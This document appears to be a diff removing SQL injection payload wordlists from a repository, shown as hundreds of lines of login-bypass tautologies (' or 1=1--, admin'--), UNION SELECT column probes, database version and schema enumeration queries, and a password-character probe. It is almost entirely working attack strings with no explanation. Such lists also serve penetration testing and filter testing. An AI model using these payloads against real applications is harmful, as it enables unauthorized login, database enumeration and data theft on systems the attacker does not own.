"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
